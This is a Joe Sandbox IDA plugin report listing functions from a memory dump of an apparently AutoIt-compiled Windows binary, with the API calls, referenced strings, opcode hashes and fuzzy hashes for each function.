Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: 38314640057e57a3062603fe5684c74a53fee6300b7c1fcba9a40c6b251facd0
Instruction ID: b1dffc2b1f465d30c01942583b3c56d0178367dbb6138093c13fb9f273c02154
Opcode Fuzzy Hash: 38314640057e57a3062603fe5684c74a53fee6300b7c1fcba9a40c6b251facd0
Instruction Fuzzy Hash: DD31D631A003059FEF24CF98DD85BAEBBF8EF45350F1CC029EA89A61A1D7709944DB51

Function 00A839E9 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 84COMMON

Download Yara Rule

APIs

__snwprintf.LIBCMT ref: 00A83A66

Part of subcall function 00A17DE1: _memmove.LIBCMT ref: 00A17E22

Strings

AUTOITCALLVARIABLE%d, xrefs: 00A83A58
, $, xrefs: 00A83AA6

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: __snwprintf_memmove
String ID: , $$AUTOITCALLVARIABLE%d
API String ID: 3506404897-2584243854
Opcode ID: 8b5ed8ea192b0dda8e04436d997f204ab9de4746fd8fbb9cc156f526147c4893
Instruction ID: 458a454234aba74d98e4b80c4eb93412ffffd4e40a3e49622e55778e8255fb4d
Opcode Fuzzy Hash: 8b5ed8ea192b0dda8e04436d997f204ab9de4746fd8fbb9cc156f526147c4893
Instruction Fuzzy Hash: E3216F31600219AECF14FF64CD82EEEB7B9BF44B40F544859F445AB181DB35EA85CBA1

Function 00A966D4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00A96761
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00A9676C

Strings

Combobox, xrefs: 00A9672E

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: MessageSend
String ID: Combobox
API String ID: 3850602802-2096851135
Opcode ID: 840f630a46eb4cc8f4cc19cee7420ed4a69ab175e2abe12e3aa3dffeae4e6e43
Instruction ID: f9979ebdf40e743043e4a26b9ec0ce298fff29cf589dd2b4c3b28910e45c8af0
Opcode Fuzzy Hash: 840f630a46eb4cc8f4cc19cee7420ed4a69ab175e2abe12e3aa3dffeae4e6e43
Instruction Fuzzy Hash: B411B271300208BFEF11CF94DC80EFB37AAEF483A8F110129F9149B290D6319C5187A0

Function 00A96C07 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON

Download Yara Rule

APIs

Part of subcall function 00A11D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00A11D73
Part of subcall function 00A11D35: GetStockObject.GDI32(00000011), ref: 00A11D87
Part of subcall function 00A11D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00A11D91

GetWindowRect.USER32(00000000,?), ref: 00A96C71
GetSysColor.USER32(00000012), ref: 00A96C8B

Strings

static, xrefs: 00A96C4E

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: Window$ColorCreateMessageObjectRectSendStock
String ID: static
API String ID: 1983116058-2160076837
Opcode ID: 10a4bbe2e5a4a6428221d77f6166aa469523f0a09ddab0a6da592c4b6342491b
Instruction ID: 7f007b0a814bc0565d0f7160034611f68041941dd45540423712e69211426af4
Opcode Fuzzy Hash: 10a4bbe2e5a4a6428221d77f6166aa469523f0a09ddab0a6da592c4b6342491b
Instruction Fuzzy Hash: 1F212972610209AFDF04DFB8CD45AEA7BF8FF08314F154629F995D2250D635E851DB60

Function 00A96920 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON

Download Yara Rule

APIs

GetWindowTextLengthW.USER32(00000000), ref: 00A969A2
SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00A969B1

Strings

edit, xrefs: 00A96986

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: LengthMessageSendTextWindow
String ID: edit
API String ID: 2978978980-2167791130
Opcode ID: e2be66e0a3c8d191f334d7c6da7b85b44956c9b15f7a5da5201f1f99822dcc51
Instruction ID: 9a639fd11dc776b5626acb2067747e6213e299ade167b5206272ac4ebc97b43d
Opcode Fuzzy Hash: e2be66e0a3c8d191f334d7c6da7b85b44956c9b15f7a5da5201f1f99822dcc51
Instruction Fuzzy Hash: 7C113A71611208AFEF108F649C45EEB37A9EF053B8F604724F9A5961E0CB75DC91A760

Function 00A729AF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00A72A22
GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00A72A41

Strings

0, xrefs: 00A72A18

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: f24bad5f396272ecab98d174959c1ba20dd5db02afb3ce9b9b189bc913cc7230
Instruction ID: 9f531d54bf678cecf155d14d4b0f231ccfa565d2ade665b18a72b72bcfeb0c8d
Opcode Fuzzy Hash: f24bad5f396272ecab98d174959c1ba20dd5db02afb3ce9b9b189bc913cc7230
Instruction Fuzzy Hash: 93119072D01114ABDB30DBA9DC44BAA77B8AB45390F15C032E95DE72A0D770AD0AD791

Function 00A821D6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00A8222C
InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00A82255

Strings

<local>, xrefs: 00A8221D

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: Internet$OpenOption
String ID: <local>
API String ID: 942729171-4266983199
Opcode ID: 66dff498f51120aaeb1bcb9cd9fc4054399aa5f31d7a76a1e2f9742fa9f44b77
Instruction ID: f7f76d880d3ba0196c612b484a32bc92d9d6e76556b3cec88b9d9fdac568be6c
Opcode Fuzzy Hash: 66dff498f51120aaeb1bcb9cd9fc4054399aa5f31d7a76a1e2f9742fa9f44b77
Instruction Fuzzy Hash: 6511CEB0641225BEDB25AF518CC8FFBFBA8FF16751F10822AF91586000E6706991D7F0

Function 00A68E05 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00A17DE1: _memmove.LIBCMT ref: 00A17E22

Part of subcall function 00A6AA99: GetClassNameW.USER32(?,?,000000FF), ref: 00A6AABC

SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00A68E73

Strings

ListBox, xrefs: 00A68E3D
ComboBox, xrefs: 00A68E12

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: a5b53473d18bf65d21b50c5661ecfd959507a6f3e887423359977c4afe26a46d
Instruction ID: 1b18f19cbb42156765b8f5a31ddc387439fc7c8fb443af7bd6da5f1af99eb64d
Opcode Fuzzy Hash: a5b53473d18bf65d21b50c5661ecfd959507a6f3e887423359977c4afe26a46d
Instruction Fuzzy Hash: 3301F1B5A01218AB8B14EBF0CD41DFE737CAF11320B440A1AF831672E1DE369848CA50

Function 00A78D91 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00A78DAC
__fread_nolock.LIBCMT ref: 00A78DC1

Strings

EA06, xrefs: 00A78DF3

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: __fread_nolock_memmove
String ID: EA06
API String ID: 1988441806-3962188686
Opcode ID: d3208091e921f3b451876a7e8067845204cf645fe810ec8de77293b5d0439ef9
Instruction ID: f488c76ecd9095c43e2e08ed8aa363f5c788c196cbe9adbe986dc125c99632e3
Opcode Fuzzy Hash: d3208091e921f3b451876a7e8067845204cf645fe810ec8de77293b5d0439ef9
Instruction Fuzzy Hash: 5101DD72D442187EDB28CBA8CC56EFE7BF8DB15311F00459FF556D2181E979E6048760

Function 00A68CFD Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00A17DE1: _memmove.LIBCMT ref: 00A17E22

Part of subcall function 00A6AA99: GetClassNameW.USER32(?,?,000000FF), ref: 00A6AABC

SendMessageW.USER32(?,00000180,00000000,?), ref: 00A68D6B

Strings

ListBox, xrefs: 00A68D35
ComboBox, xrefs: 00A68D0A

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: 5d31d5d202dd514d16fc3a458ecae4ea3c358a8c49052fc851bdda1f1bd37925
Instruction ID: eec804be1e8cc4fe2c9634c9e131a4ddc66f61ab926965905ab2fcc4fdb3e95f
Opcode Fuzzy Hash: 5d31d5d202dd514d16fc3a458ecae4ea3c358a8c49052fc851bdda1f1bd37925
Instruction Fuzzy Hash: 9701DF75A41108FBCB15EBE0CA52EFE73BC9F25340F50011AB902672E1DE245E48DA72

Function 00A68D82 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00A17DE1: _memmove.LIBCMT ref: 00A17E22

Part of subcall function 00A6AA99: GetClassNameW.USER32(?,?,000000FF), ref: 00A6AABC

SendMessageW.USER32(?,00000182,?,00000000), ref: 00A68DEE

Strings

ListBox, xrefs: 00A68DBA
ComboBox, xrefs: 00A68D8F

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: ClassMessageNameSend_memmove
String ID: ComboBox$ListBox
API String ID: 372448540-1403004172
Opcode ID: 5b8a457e0a62a265c386571c53d9cc5948ce96fb84d0a40809a4b26d25cbac70
Instruction ID: 7d7c160b5a894f73574c50002143d13d11a0c1292e45fbe48ea803e9bacd7c3c
Opcode Fuzzy Hash: 5b8a457e0a62a265c386571c53d9cc5948ce96fb84d0a40809a4b26d25cbac70
Instruction Fuzzy Hash: 7001FDB1A41108FBDB10EBE4CA42EFE73BC9F21340F50411AB902B32D2DE254E08DA72

Function 00A74F28 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 00A74F46
_wcscmp.LIBCMT ref: 00A74F58

Strings

#32770, xrefs: 00A74F52

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: ClassName_wcscmp
String ID: #32770
API String ID: 2292705959-463685578
Opcode ID: 27f3e774622591f8ff8bec2894f209a4dbd8f0fdb62b35ef1239d481e4cc4e17
Instruction ID: 82583f078fa0696f88862c34af005bc3477a2cfe237e2a5e92df2f546cd6f4ae
Opcode Fuzzy Hash: 27f3e774622591f8ff8bec2894f209a4dbd8f0fdb62b35ef1239d481e4cc4e17
Instruction Fuzzy Hash: FFE092326042282AE720DB99AC4AFA7F7ACEB45B60F01006BFD04D6051DA609A5687E1

Function 00A4B2C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 00A4B314: _memset.LIBCMT ref: 00A4B321

Part of subcall function 00A30940: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00A4B2F0,?,?,?,00A1100A), ref: 00A30945

IsDebuggerPresent.KERNEL32(?,?,?,00A1100A), ref: 00A4B2F4
OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00A1100A), ref: 00A4B303

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00A4B2FE

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 3158253471-631824599
Opcode ID: df05f1b9b62b65311ca5c7c3cc9ae569b4f7e398a6220cfb49ab8df113f2ea96
Instruction ID: 639c44493b851943d961d7cc52c4aac7d152cd3a57402155cf79a39229d8749e
Opcode Fuzzy Hash: df05f1b9b62b65311ca5c7c3cc9ae569b4f7e398a6220cfb49ab8df113f2ea96
Instruction Fuzzy Hash: 1AE06D742107108FD720DF6AD5047867BE8AF44344F00892EE456CB651EBB4E445CBB1

Function 00A51935 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(?), ref: 00A51775

Part of subcall function 00A8BFF0: LoadLibraryA.KERNEL32(kernel32.dll,?,00A5195E,?), ref: 00A8BFFE
Part of subcall function 00A8BFF0: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00A8C010

FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 00A5196D

Strings

WIN_XPe, xrefs: 00A51788

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: Library$AddressDirectoryFreeLoadProcSystem
String ID: WIN_XPe
API String ID: 582185067-3257408948
Opcode ID: b5220dd0344504f72e97a91f516f68333ea99e5145204d9900574a0d02634e9a
Instruction ID: 1b36447774c20a08ecd55f897d388fc1caf8b782c3c365703a4aad7dac5fb2c0
Opcode Fuzzy Hash: b5220dd0344504f72e97a91f516f68333ea99e5145204d9900574a0d02634e9a
Instruction Fuzzy Hash: 88F0C970801109EFDB15DB95CA84BFCBBF8BB0C302F641096E512A61A1DB758F89DF60

Function 00A95998 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00A959AE
PostMessageW.USER32(00000000), ref: 00A959B5

Part of subcall function 00A75244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00A752BC

Strings

Shell_TrayWnd, xrefs: 00A959A7

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: f89c099b82206d6fd638062af70c796ba82b6d272c82910f59dd08a252629b99
Instruction ID: 851fe1cc8dc8d3c13791d5cd9f3593cd229a8399c2e5e8ac8b876e0a431a9e7c
Opcode Fuzzy Hash: f89c099b82206d6fd638062af70c796ba82b6d272c82910f59dd08a252629b99
Instruction Fuzzy Hash: AFD0C9317803117BE664ABB09C0BFD76614BB04B50F01482AB34AEA1D1CDE4A801C694

Function 00A95964 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00A9596E
PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00A95981

Part of subcall function 00A75244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00A752BC

Strings

Shell_TrayWnd, xrefs: 00A95967

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: 77acfaf195a175a3222587164ecc9e32a2dc9b8917a9278101ba7e6e1bf9548b
Instruction ID: ef0df030c660ba7d5620b4be8375715e24008f6ba63db54e8bef12a7d95be6bc
Opcode Fuzzy Hash: 77acfaf195a175a3222587164ecc9e32a2dc9b8917a9278101ba7e6e1bf9548b
Instruction Fuzzy Hash: CED01231784311BBE664FBB09C0FFD76A14BF00B50F01483AB34AEA1D1CDE49801C694

